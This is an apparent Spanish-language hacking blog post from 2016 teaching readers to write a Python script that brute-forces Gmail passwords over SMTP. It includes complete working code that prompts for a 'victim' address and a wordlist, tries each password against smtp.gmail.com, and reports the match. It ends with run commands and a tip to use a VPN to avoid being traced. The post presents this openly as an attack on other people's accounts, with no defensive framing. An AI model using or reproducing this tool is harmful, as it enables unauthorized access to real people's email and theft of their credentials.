martes, 20 de septiembre de 2016

APRENDE A CREAR UNA FUERZA BRUTA PARA GMAIL CON PYTHON EN KALI LINUX 2016.2

El otro día estaba pensando en hacer una pequeña fuerza bruta para un KEYPAD de ARDUINO para un compañero de la EKOSPACE. Pero lo interesante es que ya he escrito sobre ataques para gmail pero ahora mismo vamos a crear nuestro propio ataque.


Primero quiero que mire mi anterior post sobre un backdoor para gmail. Ahora vamos a repasar un poco sobre las conexiones que tiene gmail.
server: smtp.gmail.com 
port: 465 
port: 587 

Ahora vamos a escribir nuestro comando para eso tenemos que tener instalado PYTHON en nuestra maquina vamos a usar la librería "smtplib"

Que es  smtplib?
Es una librería estándar de Python, quien nos permitirá enviar mensajes de correo electrónico, incluso, en formato HTML.

Ahora vamos a colocar los servidores de gmail para la conexión.


smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls() 
  

Lo que vemos es la conexión al server con su puerto detallado.
En el siguiente paso vamos a colocar para el usuario ingrese el correo de la victima y coloque el diccionario.


user = raw_input("Ingresa el correo de tu victima: ")
passwfile = raw_input("El archivo del diccionario: ")
passwfile = open(passwfile, "r")
 
Como vemos que user se encargará como el usuario de la victima y con la siguiente orden seria la ubicación del diccionario. En el código vemos que en la misma carpeta o ubicada el mismo programa en python agarrará el diccionario.
Después de haber colocado los mensaje ahora vamos a colocar las ordenes que hará nuestro programa en python.
for password in passwfile:
        try:
                smtpserver.login(user, password)
 
                print "[+] Password Found: %s" % password
                break;
        except smtplib.SMTPAuthenticationError:
                print "[!] Password Incorrect: %s" % password 
 
 

De la contraseña lo buscara en un archivo en el cual se conectará al servidor indicado y te mostrará los mensajes si es correcto o es incorrecto.
Muy simple código y fácil de usar.
Si quieres el código completo puedes encontrarlo aquí.
Ahora solo vamos a guardarlo y darle privilegios.

chmod 775 gmail.py 
chmod +x gmail.py 
RUN
python gmail.py
Listo ahora con tu diccionario puedes hacer tu ataque fácil.

Antes de aclarar si tu cuenta esta protegida puedes pinchar aquí para ver si esta segura o esta desprotegida.
Al estar segura el ataque será bloqueado.
Te olvides en usar un VPN para mayor seguridad.
No olvides en compartirlo y apoyar este proyecto de programación.


No hay comentarios. :

Publicar un comentario